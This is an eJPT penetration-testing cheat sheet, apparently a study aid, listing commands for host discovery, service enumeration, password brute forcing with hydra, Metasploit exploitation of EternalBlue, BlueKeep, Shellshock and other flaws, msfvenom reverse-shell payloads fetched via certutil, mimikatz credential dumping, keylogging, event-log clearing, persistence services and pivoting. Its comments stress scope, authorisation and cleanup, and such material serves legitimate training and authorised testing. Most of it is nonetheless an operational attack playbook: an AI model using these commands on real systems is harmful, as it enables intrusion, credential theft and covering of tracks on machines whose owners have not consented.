eJPT CheatSheet
eJPT CheatSheet
Networking
# Routing
# Linux
ip route
# Windows
route print
# Mac OS X / Linux
netstat -r
# IP
# Linux
ip a
ip -br -c a
# Windows
ipconfig /all
# Mac OS X / Linux
ifconfig
# ARP
# Linux
# ("ip neigh" is the canonical short form; this is the cache to compare against when checking for ARP spoofing)
ip neighbour
# Windows
arp -a
# Mac OS X / Linux
arp
# PORTS
# Linux
# -p (owning PID/program) is only shown for other users' processes when run as root
netstat -tunp
netstat -tulpn
# listening TCP sockets only: add -u for UDP, -p for the owning process
ss -tnl
# Windows
# -o prints the PID; map it with: tasklist /FI "PID eq <PID>"
netstat -ano
# Mac OS X / Linux
# NOTE(review): on macOS this form prints protocol statistics on some versions; "netstat -an -p tcp" lists the sockets — verify on the host
netstat -p tcp -p udp
# add -P to skip port-name lookups if the output is slow/misleading
lsof -n -i4TCP -i4UDP
# Connect
nc -v example.com 80
# Scan port
# -z probes without sending data, but it is still a full connect() and shows up in the target's logs
nc -zv <HOST> <PORT>
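Information Gathering
# Passive
# NOTE: only host/whois and the Google dorks below are truly passive. whatweb and
# wafw00f talk to the target's web server, dnsrecon/dnsenum query its name servers,
# and theHarvester/sublist3r hit third-party sources — confirm they are in scope first.
host <HOST>
whatweb <HOST>
whois <HOST>
whois <IP>
dnsrecon -d <HOST>
# -l lists the WAF vendors wafw00f can fingerprint; -a tests all of them against the host
wafw00f -l
wafw00f <HOST> -a
sublist3r -d <HOST>
theHarvester -d <HOST>
theHarvester -d <HOST> -b all
# Google Dorks
site:
inurl:
site:*.sitename.com
intitle:
filetype:
intitle:index of
cache:
inurl:auth_user_file.txt
inurl:passwd.txt
inurl:wp-config.bak
# DNS
sudo nano /etc/hosts
dnsenum <HOST>
# e.g. dnsenum zonetransfer.me
dig <HOST>
# Zone transfer: only succeeds when the server is misconfigured to allow AXFR from anyone.
# Pick the server from "dig NS <HOST>"; a successful transfer is itself a finding.
dig axfr @DNS-server-name <HOST>
# HOST DISCOVERY
## Ping scan
sudo nmap -sn <TARGET_IP/NETWORK>
## ARP scan
# ARP only reaches hosts on the same L2 segment as eth1
netdiscover -i eth1 -r <TARGET_IP/NETWORK>
## fping
fping -I eth1 -g <TARGET_IP/NETWORK> -a
## fping with no "Host Unreachable errors"
# (the original listed the command twice on one line; it is a single command with stderr discarded)
fping -I eth1 -g <TARGET_IP/NETWORK> -a 2>/dev/null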
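Enumeration
SMB
# NMAP
sudo nmap -p 445 -sV -sC -O <TARGET_IP>
# UDP scans (-sU) need raw sockets, so they must run as root like the -O scan above
sudo nmap -sU --top-ports 25 --open <TARGET_IP>
nmblookup -A <TARGET_IP>
# SMBMAP
# guest/null-session check; "-d ." means the local (non-domain) account database
smbmap -u guest -p "" -d . -H <TARGET_IP>
## Run a command
# -x needs admin rights on the target and leaves service/event-log traces
smbmap -u <USER> -p '<PW>' -H <TARGET_IP> -x 'ipconfig'
## List all drives
smbmap -u <USER> -p '<PW>' -H <TARGET_IP> -L
## List dir content
smbmap -u <USER> -p '<PW>' -H <TARGET_IP> -r 'C$'
## Upload a file (one command: source path, then <SHARE>\<PATH> on the target)
smbmap -u <USER> -p '<PW>' -H <TARGET_IP> --upload '/root/sample_backdoor' 'C$\sample_backdoor'
## Download a file
smbmap -u <USER> -p '<PW>' -H <TARGET_IP> --download 'C$\flag.txt'
# SMB Connection
# -N = no password (null session); -U prompts for the password instead of putting it on the command line
smbclient -L <TARGET_IP> -N
smbclient -L <TARGET_IP> -U <USER>
smbclient //<TARGET_IP>/<USER> -U <USER>
smbclient //<TARGET_IP>/admin -U admin
smbclient //<TARGET_IP>/public -N
## SMBCLIENT
help
ls
get <filename>
# ENUM4LINUX
enum4linux -o <TARGET_IP>
enum4linux -U <TARGET_IP>
enum4linux -S <TARGET_IP>
enum4linux -G <TARGET_IP>
enum4linux -i <TARGET_IP>
enum4linux -r -u "<USER>" -p "<PW>" <TARGET_IP>
enum4linux -a -u "<USER>" -p "<PW>" <TARGET_IP>
# HYDRA
gzip -d /usr/share/wordlists/rockyou.txt.gz
# Online guessing against SMB: check the lockout policy first (enum4linux -P) and keep -t low
hydra -l <USER> -P /usr/share/wordlists/rockyou.txt -t 4 <TARGET_IP> smb
# METASPLOIT
msfconsole
msfconsole -q
# METASPLOIT SMB
use auxiliary/scanner/smb/smb_version
use auxiliary/scanner/smb/smb_enumusers
use auxiliary/scanner/smb/smb_enumshares
use auxiliary/scanner/smb/smb_login
use auxiliary/scanner/smb/pipe_auditor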
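FTP
# NMAP
sudo nmap -p 21 -sV -sC -O <TARGET_IP>
# -O (OS fingerprint) needs raw sockets: keep the sudo
sudo nmap -p 21 -sV -O <TARGET_IP>
# FTP
# try anonymous:anonymous first; FTP sends real credentials in clear text
ftp <TARGET_IP>
## FTP client
ls
get <filename>
# HYDRA
# -t 4 keeps the parallelism low enough that the server does not start dropping connections
hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt <TARGET_IP> -t 4 ftp
SSH
# NMAP
sudo nmap -p 22 -sV -sC -O <TARGET_IP>
# SSH
# the port goes in -p; a bare trailing "22" would be sent to the server as a remote command
ssh <USER>@<TARGET_IP> -p 22
ssh root@<TARGET_IP> -p 22
# HYDRA
# sshd (MaxStartups) drops parallel attempts — hydra itself recommends -t 4 for ssh
hydra -l <USER> -P /usr/share/wordlists/rockyou.txt -t 4 <TARGET_IP> ssh
# METASPLOIT SSH
use auxiliary/scanner/ssh/ssh_login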
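HTTP
# NMAP
sudo nmap -p 80 -sV -O <TARGET_IP>
whatweb <TARGET_IP>
# httpie client (pretty-printed request/response)
http <TARGET_IP>
browsh --startup-url http://<TARGET_IP>
# directory brute force: noisy (thousands of requests) and visible in the access log
dirb http://<TARGET_IP>
dirb http://<TARGET_IP> /usr/share/metasploit-framework/data/wordlists/directory.txt
wget <TARGET_IP>
curl <TARGET_IP> | more
curl -I http://<TARGET_IP>/<DIR>
# A password on the command line ends up in shell history and is visible to every local user via ps.
# Prefer "-u <USER>" alone: curl then prompts for the password.
curl --digest -u <USER>:<PW> http://<TARGET_IP>/<DIR>
lynx <TARGET_IP>
# METASPLOIT HTTP
use auxiliary/scanner/http/brute_dirs
use auxiliary/scanner/http/robots_txt
use auxiliary/scanner/http/http_header
use auxiliary/scanner/http/http_login
use auxiliary/scanner/http/http_version
# Global set
# RHOSTS is the current option name; RHOST is kept for older modules that still use it
setg RHOSTS <TARGET_IP>
setg RHOST <TARGET_IP>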
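SQL
# NMAP
sudo nmap -p 3306 -sV -O <TARGET_IP>
## Microsoft SQL
nmap -sV -sC -p 1433 <TARGET_IP>
# MYSQL
# no -p: the client tries an empty password (a quick misconfiguration check); add -p to be prompted
mysql -h <TARGET_IP> -u <USER>
mysql -h <TARGET_IP> -u root
# Mysql client
help
show databases;
use <DB_NAME>;
select count(*) from <TABLE_NAME>;
# Returns NULL unless the account has the FILE privilege, secure_file_priv allows the path and
# the mysqld OS user can read the file (normally only root/shadow can read /etc/shadow)
select load_file("/etc/shadow");
# HYDRA
hydra -l <USER> -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt <TARGET_IP> mysql
# METASPLOIT MYSQL
use auxiliary/scanner/mysql/mysql_schemadump
use auxiliary/scanner/mysql/mysql_writable_dirs
use auxiliary/scanner/mysql/mysql_file_enum
use auxiliary/scanner/mysql/mysql_hashdump
use auxiliary/scanner/mysql/mysql_login
## MS Sql
use auxiliary/scanner/mssql/mssql_login
use auxiliary/admin/mssql/mssql_enum
use auxiliary/admin/mssql/mssql_enum_sql_logins
# runs OS commands through xp_cmdshell — needs a sysadmin login and enables xp_cmdshell if it is off
use auxiliary/admin/mssql/mssql_exec
use auxiliary/admin/mssql/mssql_enum_domain_accounts
# Global set
setg RHOSTS <TARGET_IP>
setg RHOST <TARGET_IP>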
SMTP
# NMAP
sudo nmap -p 25 -sV -sC -O <TARGET_IP>
# Manual banner grab / user check (EHLO <name>, VRFY <user>, EXPN <list>); every probe is logged by the MTA
nc <TARGET_IP> 25
telnet <TARGET_IP> 25
# METASPLOIT
service postgresql start && msfconsole -q
# Global set
setg RHOSTS <TARGET_IP>
setg RHOST <TARGET_IP>
# enumerates users via VRFY/EXPN/RCPT TO; set USER_FILE to use a different wordlist
use auxiliary/scanner/smtp/smtp_enum
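Vulnerability Assessment
# HEARTBLEED
# Cipher/protocol inventory (weak suites, SSLv3/TLS 1.0) — a separate finding from Heartbleed itself
nmap -sV --script ssl-enum-ciphers -p <SECURED_PORT> <TARGET>
nmap -sV --script ssl-heartbleed -p 443 <TARGET_IP>
# ETERNALBLUE
nmap --script smb-vuln-ms17-010 -p 445 <TARGET_IP>
# BLUEKEEP
msfconsole
# The RCE module can blue-screen the host when the target/GROOMSIZE is wrong.
# Confirm with auxiliary/scanner/rdp/cve_2019_0708_bluekeep first and get sign-off before exploiting.
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
# LOG4J
# log4shell.nse is not part of the stock NSE set — install it into the nmap scripts path first.
# The callback server (<CALLBACK_SERVER_IP>:1389) must be reachable from the target for a hit to register.
nmap --script log4shell.nse --script-args log4shell.callback-server=<CALLBACK_SERVER_IP>:1389 -p 8080 <TARGET_IP>
searchsploit badblue 2.7
# IIS WEBDAV
davtest -url <URL>
# davtest uploads test files of several types to the share — note the names it prints and clean them up afterwards
davtest -auth <USER>:<PW> -url http://<TARGET_IP>/webdav
hydra -L /usr/share/wordlists/metasploit/common_users.txt -P /usr/share/wordlists/metasploit/common_passwords.txt <TARGET_IP> http-get /webdav/
## METASPLOIT
# Global set
setg RHOSTS <TARGET_IP>
setg RHOST <TARGET_IP>
use exploit/multi/handler
use exploit/windows/iis/iis_webdav_upload_asp
# SMB
nmap -p 445 -sV -sC <TARGET_IP>
## METASPLOIT
# Global set
setg RHOSTS <TARGET_IP>
setg RHOST <TARGET_IP>
use auxiliary/scanner/smb/smb_login
use exploit/windows/smb/psexec
# can crash unpatched hosts; run auxiliary/scanner/smb/smb_ms17_010 first
use exploit/windows/smb/ms17_010_eternalblue
# Manual MS17-010 (presumably the AutoBlue-style scripts checked out in the current directory)
cd shellcode
chmod +x shell_prep.sh
./shell_prep.sh
# LHOST = Host Kali Linux IP
# LPORT = Port Kali will listen for the reverse shell
cd ..
chmod +x eternalblue_exploit7.py
# Start exploit/multi/handler with the same LHOST/LPORT before running this: it is one-shot
# and a failed attempt can take the target down
python eternalblue_exploit7.py <TARGET_IP> shellcode/sc_x64.bin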
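RDP
# RDP
# (add -p 3389 to keep the scan to the RDP port)
nmap -sV <TARGET_IP>
## METASPLOIT
# Global set
setg RHOSTS <TARGET_IP>
setg RHOST <TARGET_IP>
use auxiliary/scanner/rdp/rdp_scanner
# safe check first
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
# target selection and GROOMSIZE belong to the RCE module, not the scanner above
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
show targets
set target <NUMBER>
set GROOMSIZE 50
# RDP lockout comes fast and servers drop parallel logins: hydra recommends -t 1 (optionally -W 1) for rdp
hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt rdp://<TARGET_IP> -s <PORT>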
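WINRM
# WINRM
# e.g. crackmapexec winrm <TARGET_IP> -u <USER> -p '<PW>'   ("Pwn3d!" = the account can run commands)
crackmapexec [OPTIONS]
evil-winrm -i <IP> -u <USER> -p <PASSWORD>
nmap --top-ports 7000 <TARGET_IP>
# 5985 = WinRM over HTTP, 5986 = over HTTPS — check both
nmap -sV -p 5985,5986 <TARGET_IP>
# Command Shell
evil-winrm.rb -u <USER> -p '<PW>' -i <TARGET_IP>
## METASPLOIT
# Global set
setg RHOSTS <TARGET_IP>
setg RHOST <TARGET_IP>
use exploit/windows/winrm/winrm_script_exec
# WIN KERNEL
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LOCAL_HOST_IP> LPORT=<LOCAL_PORT> -f exe -o payload.exe
python3 -m http.server
# Download payload.exe on target
## Windows-Exploit-Suggester Install
mkdir Windows-Exploit-Suggester
cd Windows-Exploit-Suggester
# Pinned to a commit hash; still read the script before running anything fetched from a raw URL
wget https://raw.githubusercontent.com/AonCyberLabs/Windows-Exploit-Suggester/f34dcc186697ac58c54ebe1d32c7695e040d0ecb/windows-exploit-suggester.py
# ^^ This is a python3 version of the script
# (the second "cd Windows-Exploit-Suggester" of the original was dropped: it ran from inside the directory and failed)
# xlrd is needed to parse the downloaded MSRC spreadsheet, so install it before --update
pip install xlrd --upgrade
python ./windows-exploit-suggester.py --update
# then compare against the target's "systeminfo" output:
#   python ./windows-exploit-suggester.py --database <YYYY-MM-DD-mssb.xls> --systeminfo <systeminfo.txt>
## METASPLOIT
## Global set
setg RHOSTS <TARGET_IP>
setg RHOST <TARGET_IP>
use exploit/multi/handler
options
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <LOCAL_HOST_IP>
set LPORT <LOCAL_PORT>
# run against an existing meterpreter session; it only lists candidates — check each one
use post/multi/recon/local_exploit_suggester
set SESSION <HANDLER_SESSION_NUMBER>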
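UAC
# UAC - UACME
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LOCAL_HOST_IP> LPORT=<LOCAL_PORT> -f exe > backdoor.exe
## METASPLOIT - Listening
# (RHOSTS/RHOST are not used by multi/handler; LHOST/LPORT must match the msfvenom values above)
setg RHOSTS <TARGET_IP>
setg RHOST <TARGET_IP>
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <LOCAL_HOST_IP>
set LPORT <LOCAL_PORT>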
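Access Token
load incognito
list_tokens -u
# Meterpreter treats a single backslash as an escape: write DOMAIN\\User
impersonate_token "ATTACKDEFENSE\\Administrator"
getuid
getprivs # Access Denied
pgrep explorer
migrate <explorer_PID>
getprivs
list_tokens -u
impersonate_token "NT AUTHORITY\\SYSTEM"
# Exploitation
# LHOST is the attacker (handler) address and must match the handler's LHOST/LPORT below
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LOCAL_HOST_IP> LPORT=<LOCAL_PORT> -f exe > payload.exe
# serve the payload (python3 http.server replaces the py2 SimpleHTTPServer; port 80 needs root)
sudo python3 -m http.server 80
## METASPLOIT
setg RHOSTS <TARGET_IP>
setg RHOST <TARGET_IP>
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <LOCAL_HOST_IP>
set LPORT <LOCAL_PORT>
run
## On target system
# fetch from the attacker box, not from the target's own address
certutil -urlcache -f http://<LOCAL_HOST_IP>/payload.exe payload.exe
# Run payload.exe
# METASPLOIT - Meterpreter
sysinfo
getuid
# lsass runs as SYSTEM, but a failed migration into it can crash the host (forced reboot).
# Prefer getsystem, or migrate into a SYSTEM-owned service process instead.
pgrep lsass
migrate <lsass_PID>
getprivs
# MIMIKATZ
cd C:\
mkdir Temp
cd Temp
# dropping mimikatz.exe on disk is caught by most AV/EDR; record the artefact for cleanup
upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe
shell
mimikatz.exe
# needs SeDebugPrivilege (admin/SYSTEM); lsadump reads SAM/LSA secrets, sekurlsa reads LSASS memory
privilege::debug
lsadump::sam
lsadump::secrets
sekurlsa::logonPasswords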
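Linux Exploitation
Shellshock
# BASH - APACHE
nmap -sV --script=http-shellshock --script-args "http-shellshock.uri=/gettime.cgi" <TARGET_IP>
## METASPLOIT
# Global set
setg RHOSTS <TARGET_IP>
setg RHOST <TARGET_IP>
use exploit/multi/http/apache_mod_cgi_bash_env_exec
set RHOSTS <TARGET_IP>
set TARGETURI /gettime.cgi
exploit
FTP
# FTP
ftp <TARGET_IP>
# list the FTP NSE scripts (the original unquoted "ftp-*" was a shell glob that fell back to a regex matching anything containing "ftp")
ls -lah /usr/share/nmap/scripts | grep 'ftp-'
searchsploit ProFTPD
hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt <TARGET_IP> -t 4 ftp
SSH
# SSH
ssh <USER>@<TARGET_IP>
# the following run on the target after login
groups sysadmin
cat /etc/*release
uname -r
cat /etc/passwd
find / -name "flag" 2>/dev/null
hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/common_passwords.txt <TARGET_IP> -t 4 ssh
SAMBA
# SAMBA
smbmap -u <USER> -p '<PW>' -H <TARGET_IP>
enum4linux -a <TARGET_IP>
enum4linux -a -u "<USER>" -p "<PW>" <TARGET_IP>
# linux-exploit-suggester.sh has to be transferred to the target first (e.g. via http.server + wget/curl).
# It only lists candidates — verify the kernel/distro version before running any suggested exploit.
chmod +x linux-exploit-suggester.sh
./linux-exploit-suggester.sh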
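Cron Jobs
# CRON
crontab -l
# also the system-wide jobs: cat /etc/crontab; ls -la /etc/cron.* — a root job that runs a world-writable script is the usual privesc
SUID
# SUID
# find them: find / -perm -4000 -type f 2>/dev/null
file <FILE>
strings <FILE>
# find called binary
# Only works when the SUID program invokes <BINARY> by a relative name / via a writable PATH entry.
# bash resets the effective uid on start unless run with -p, so the copied bash may come up as the
# low-privileged user: a one-line script that execs "/bin/bash -p" (or a copy of /bin/sh) avoids that.
rm <BINARY>
cp /bin/bash <BINARY>
./<FILE>
cat /etc/passwd
sudo cat /etc/shadow
use auxiliary/analyze/crack_linux
set SHA512 true
# TSHARK
tshark -D
# live capture needs root or the wireshark group
tshark -i eth1
tshark -r <FILE>.pcap
tshark -r <FILE>.pcap | wc -l
# HTTP traffic
tshark -r <FILE>.pcap -Y 'http' | more
tshark -r <FILE>.pcap -Y "ip.src==<SOURCE_IP> && ip.dst==<DEST_IP>"
# Packets with frame time, source IP and URL for all GET requests
tshark -r <FILE>.pcap -Y "http.request.method==GET" -Tfields -e frame.time -e ip.src -e http.request.full_uri
# Check destination IP
tshark -r <FILE>.pcap -Y "http.request.method==GET && http.host==<TARGET_URL>" -Tfields -e ip.dst
# Check session ID
tshark -r <FILE>.pcap -Y "ip contains amazon.in && ip.src==<IP>" -Tfields -e ip.src -e http.cookie
# Only SSID/BSSID
tshark -r <FILE>.pcap -Y "wlan.fc.type_subtype==8" -Tfields -e wlan.ssid -e wlan.bssid
# WiFi Channel
tshark -r <FILE>.pcap -Y "wlan.ssid==<SSID>" -Tfields -e wlan_radio.channel
## Forward IP packets
# as root (the redirection runs in the calling shell, so "sudo echo 1 > ..." fails);
# unprivileged shells use: sudo sysctl -w net.ipv4.ip_forward=1 — revert it after the test
echo 1 > /proc/sys/net/ipv4/ip_forward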
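Metasploit
# MSF Install
sudo apt update && sudo apt install metasploit-framework -y
sudo systemctl enable postgresql
sudo systemctl restart postgresql
sudo msfdb init
ls /usr/share/metasploit-framework
ls ~/.msf4/modules
# msfconsole
db_status
help
version
show -h
show all
show exploits
search <STRING>
search cve:2017 type:exploit platform:windows
use <MODULE_NAME>
set <OPTION>
run
# "run" and "exploit" are the console aliases; "execute" is a Meterpreter command (execute -f <prog>), not a console one
exploit # same as run
sessions
# Switch between sessions Ids with
sessions 1
# Rename sessions
sessions -n xoda -i 1
# Run a Meterpreter Command on the session given with `-i`
sessions -C sysinfo -i 1
# Terminate a specific session
sessions -k 1
# Terminate all sessions
sessions -K
# Upgrade a shell session to a Meterpreter session
sessions -u 1
connect
# Payload Options
search eternalblue
use 0
# ^^ specify the identifier
set payload <PAYLOAD_NAME>
set RHOSTS <TARGET_IP>
run
# or
exploit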
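Meterpreter
# meterpreter > <command>
background
cat
cd
checksum md5 /bin/bash
# wipes the Windows Application/System/Security event logs — destructive; only with explicit authorisation
clearev
download
edit
execute -f ifconfig
getenv
getenv PATH
getuid
# needs SYSTEM; dumps the local SAM NTLM hashes
hashdump
idletime
ifconfig
lpwd
ls
migrate
mkdir
ps
pwd
resource <file.txt>
rmdir
search -f *.txt
shell
sysinfo
upload
# (msfconsole command, not Meterpreter)
workspace -a <hostname_enum>
# NMAP Export in .XML
# -O needs root
sudo nmap -Pn -sV -O <TARGET_IP> -oX <XML_FILE_NAME>
# msfconsole
db_import <XML_FILE_NAME>
hosts
services
vulns
loot
creds
notes
# Nmap inside MSF
# -O needs raw sockets: start msfconsole with sudo, or drop -O
db_nmap -Pn -sV -O <TARGET_IP>
# Exploitation
search xoda
use exploit/unix/webapp/xoda_file_upload
set RHOSTS <TARGET_IP>
set TARGETURI /
run
# UDP Scan
search udp_sweep
use auxiliary/scanner/discovery/udp_sweep
set RHOSTS <TARGET_IP>
run
# Service Enumeration
# FTP
use auxiliary/scanner/ftp/ftp_version
use auxiliary/scanner/ftp/ftp_login
use auxiliary/scanner/ftp/anonymous
# SMB
# (the original repeated the FTP anonymous module here; smb_version matches the SMB list above)
use auxiliary/scanner/smb/smb_version
use auxiliary/scanner/smb/smb_enumusers
use auxiliary/scanner/smb/smb_enumshares
use auxiliary/scanner/smb/smb_login
# HTTP
use auxiliary/scanner/http/apache_userdir_enum
use auxiliary/scanner/http/brute_dirs
use auxiliary/scanner/http/dir_scanner
use auxiliary/scanner/http/dir_listing
use auxiliary/scanner/http/http_put
use auxiliary/scanner/http/files_dir
use auxiliary/scanner/http/http_login
use auxiliary/scanner/http/http_header
use auxiliary/scanner/http/http_version
use auxiliary/scanner/http/robots_txt
# MYSQL
use auxiliary/admin/mysql/mysql_enum
use auxiliary/admin/mysql/mysql_sql
use auxiliary/scanner/mysql/mysql_file_enum
use auxiliary/scanner/mysql/mysql_hashdump
use auxiliary/scanner/mysql/mysql_login
use auxiliary/scanner/mysql/mysql_schemadump
use auxiliary/scanner/mysql/mysql_version
use auxiliary/scanner/mysql/mysql_writable_dirs
# SSH
use auxiliary/scanner/ssh/ssh_version
use auxiliary/scanner/ssh/ssh_login
use auxiliary/scanner/ssh/ssh_enumusers
# SMTP
use auxiliary/scanner/smtp/smtp_enum
use auxiliary/scanner/smtp/smtp_version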
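Vulnerability Scanning
# NMAP
# -sS and -O need raw sockets: start msfconsole with sudo (or use -sT and drop -O)
db_nmap -sS -sV -O <TARGET_IP>
# e.g.
search eternalblue
use auxiliary/scanner/smb/smb_ms17_010
# Kali Linux terminal
searchsploit "Microsoft Windows SMB" | grep -e "Metasploit"
# Metasploit Autopwn
# Third-party plugin fetched from a raw GitHub URL: read it before copying it into the plugins directory.
# "analyze"/autopwn fires exploits at every host in the current workspace — make sure the workspace only holds in-scope hosts.
wget https://raw.githubusercontent.com/hahwul/metasploit-autopwn/master/db_autopwn.rb
sudo mv db_autopwn.rb /usr/share/metasploit-framework/plugins/
# msfconsole
load db_autopwn
# msfconsole
analyze
vulns
# WMAP in msfconsole
load wmap
wmap_sites -a <TARGET_IP>
wmap_sites -l
wmap_targets -t <URL>
wmap_targets -l
wmap_run -t
wmap_run -e
wmap_vulns -l
# msfconsole
# writes a test file to the web root if PUT is enabled — remove it afterwards
use auxiliary/scanner/http/http_put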
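Payloads
# MSFVENOM
msfvenom --list payloads
msfvenom --list formats
msfvenom --list encoders
# Win 32bit
msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=<LOCAL_HOST_IP> LPORT=<LOCAL_PORT> -f exe > <PAYLOAD_FILE_x86>.exe
# Win 64bit
msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=<LOCAL_HOST_IP> LPORT=<LOCAL_PORT> -f exe > <PAYLOAD_FILE_x64>.exe
# Linux 32bit
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<LOCAL_HOST_IP> LPORT=<LOCAL_PORT> -f elf > <PAYLOAD_FILE_x86>
# Linux 64bit
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<LOCAL_HOST_IP> LPORT=<LOCAL_PORT> -f elf > <PAYLOAD_FILE_x64>
# the handler's payload/LHOST/LPORT must be exactly the msfvenom values, and the handler must be running before the payload executes
use multi/handler
set payload <MSFVENOM_PAYLOAD>
set LHOST <MSFVENOM_LOCAL_HOST_IP>
set LPORT <MSFVENOM_LOCAL_PORT>
run
# Automation
ls -lah /usr/share/metasploit-framework/scripts/resource
msfconsole -q -r handler.rc
# msfconsole
resource handler.rc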
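Win Exploitation
Default MSF Start
service postgresql start && msfconsole -q
db_status
setg RHOSTS <TARGET_IP>
setg RHOST <TARGET_IP>
workspace -a <SERVICE_NAME>
# -sS/-O need root: start msfconsole with sudo
db_nmap -sS -sV -O <TARGET_IP>
# db_nmap -sS -sV -O -p- <TARGET_IP>
HFS
# HFS
search type:exploit name:rejetto
use exploit/windows/http/rejetto_hfs_exec
SMB
# SMB
search type:auxiliary EternalBlue
# check first, exploit second: ms17_010_eternalblue can crash unpatched hosts
use auxiliary/scanner/smb/smb_ms17_010
use exploit/windows/smb/ms17_010_eternalblue
WINRM
# WinRM
search type:auxiliary winrm
use auxiliary/scanner/winrm/winrm_auth_methods
# Launch command
search winrm_cmd
use auxiliary/scanner/winrm/winrm_cmd
set USERNAME <USER>
set PASSWORD <PW>
set CMD whoami
search winrm_script
use exploit/windows/winrm/winrm_script_exec
set USERNAME <USER>
set PASSWORD <PW>
set FORCE_VBS true
TOMCAT
# APACHE TOMCAT
search type:exploit tomcat_jsp
use exploit/multi/http/tomcat_jsp_upload_bypass
# "check" tests for the vulnerability without exploiting it
check
Linux Exploitation
FTP
# FTP
search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor
# the backdoor hands back a raw root shell; upgrade it to an interactive one
/bin/bash -i
SAMBA
# SAMBA
search type:exploit name:samba
use exploit/linux/samba/is_known_pipename
SSH
# SSH
search libssh_auth_bypass
use auxiliary/scanner/ssh/libssh_auth_bypass
set SPAWN_PTY true
run
sessions
sessions 1
SMTP
# SMTP
# (the module is haraka; the original had the libssh search copied from the SSH section)
search haraka
use exploit/linux/smtp/haraka
set SRVPORT 9898
# recipient the exploit mail is addressed to (the original value was obfuscated by extraction)
set email_to <EMAIL_TO>
set payload linux/x64/meterpreter_reverse_http
set LHOST <LOCAL_IP>
set LPORT 8080
run
# This is a NON-staged payload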
Post-Exploitation Fundamentals
# METERPRETER
# moves the session out of the exploited process into a more stable one
run post/windows/manage/migrate
## Pivoting
# <LOCAL_PORT> on the attacker box is tunnelled through this session to <TARGET_IP>:<TARGET_PORT>
portfwd add -l <LOCAL_PORT> -p <TARGET_PORT> -r <TARGET_IP>
sessions
sessions 2
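Win Post-Exploitation
HTTP/HFS
# Meterpreter
sysinfo
getuid
getsystem
getuid
getprivs
hashdump
show_mount
ps
migrate
# msfconsole
use post/windows/manage/migrate
use post/windows/gather/win_privs
use post/windows/gather/enum_logged_on_users
use post/windows/gather/checkvm
use post/windows/gather/enum_applications
use post/windows/gather/enum_av_excluded
use post/windows/gather/enum_computers
use post/windows/gather/enum_patches
use post/windows/gather/enum_shares
# changes registry/firewall state on the target — record it so it can be reverted
use post/windows/manage/enable_rdp
set SESSION 1
loot
UAC
# Meterpreter
shell
# Win CMD
net users
net localgroup administrators
# Bypass UAC
background
sessions
use exploit/windows/local/bypassuac_injection
set payload windows/x64/meterpreter/reverse_tcp
set SESSION 1
set LPORT <LOCAL_PORT>
# (or pick the index from "show targets": set TARGET <NUMBER>)
set TARGET Windows\ x64
# the module has to be launched before the elevated session exists
run
getsystem
hashdump
TOKEN IMPERSONATION
DUMP HASHES
# Kiwi - Meterpreter
load kiwi
creds_all
lsa_dump_sam
lsa_dump_secrets
# Mimikatz - Meterpreter
cd C:\
mkdir Temp
cd Temp
# on-disk mimikatz is caught by most AV/EDR; note the artefact for cleanup
upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe
shell
mimikatz.exe
privilege::debug
lsadump::sam
lsadump::secrets
sekurlsa::logonPasswords
PERSISTENCE
# RDP - Meterpreter
background
# installs a Windows service on the target — agree it with the client and remove it at the end of the engagement
use exploit/windows/local/persistence_service
set payload windows/meterpreter/reverse_tcp
set SESSION 1
# Regain access
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <LOCAL_IP>
set LPORT <LOCAL_PORT>
# Enabling RDP
use post/windows/manage/enable_rdp
sessions
set SESSION 1
# KEYLOGGING - Meterpreter
keyscan_start
keyscan_dump
keyscan_stop
CLEARING
# Meterpreter
# the command is clearev ("clearenv" does not exist); it wipes the Windows event logs — only with explicit authorisation
clearev
PIVOTING
# Meterpreter
run autoroute -s <TARGET1_SUBNET_NETWORK>
use auxiliary/scanner/portscan/tcp
set RHOSTS <TARGET2_IP>
set PORTS 1-100
# Port Forwarding
sessions 1
portfwd add -l <LOCAL_PORT> -p <TARGET2_PORT> -r <TARGET2_IP>
background
# -sS needs root; -sT works unprivileged through the forwarded port
db_nmap -sS -sV -p <LOCAL_PORT> localhost
# Target2 Exploitation
# Target2 is only reachable through the pivot and cannot connect back, hence the bind payload
use exploit/windows/http/badblue_passthru
set payload windows/meterpreter/bind_tcp
set RHOSTS <TARGET2_IP>
# for bind_tcp, LPORT is the port opened on Target2
set LPORT <LOCAL_PORT2>
run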
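Linux Post-Exploitation
netstat -antp
ss -tnl
ps aux
env
# msfconsole
use post/linux/gather/enum_configs
use post/multi/gather/env
use post/linux/gather/enum_network
use post/linux/gather/enum_protections
use post/linux/gather/enum_system
use post/linux/gather/checkcontainer
use post/linux/gather/checkvm
use post/linux/gather/enum_users_history
set SESSION 1
loot
# Dumping Hashes
use post/linux/gather/hashdump
use post/multi/gather/ssh_creds
use post/linux/gather/ecryptfs_creds
use post/linux/gather/enum_psk
use post/linux/gather/pptpd_chap_secrets
set SESSION 1
# PERSISTENCE
# Meterpreter - Manual
shell
whoami
# root        <- expected output of whoami
cat /etc/passwd
# Creating a local account is a visible, persistent change: agree it with the client and remove it afterwards.
# "-aG root" only adds the root *group*; uid 15 is not uid 0, so this is still an ordinary user.
useradd -m ftp -s /bin/bash
passwd ftp
usermod -aG root ftp
usermod -u 15 ftp
groups ftp
# SSH Key
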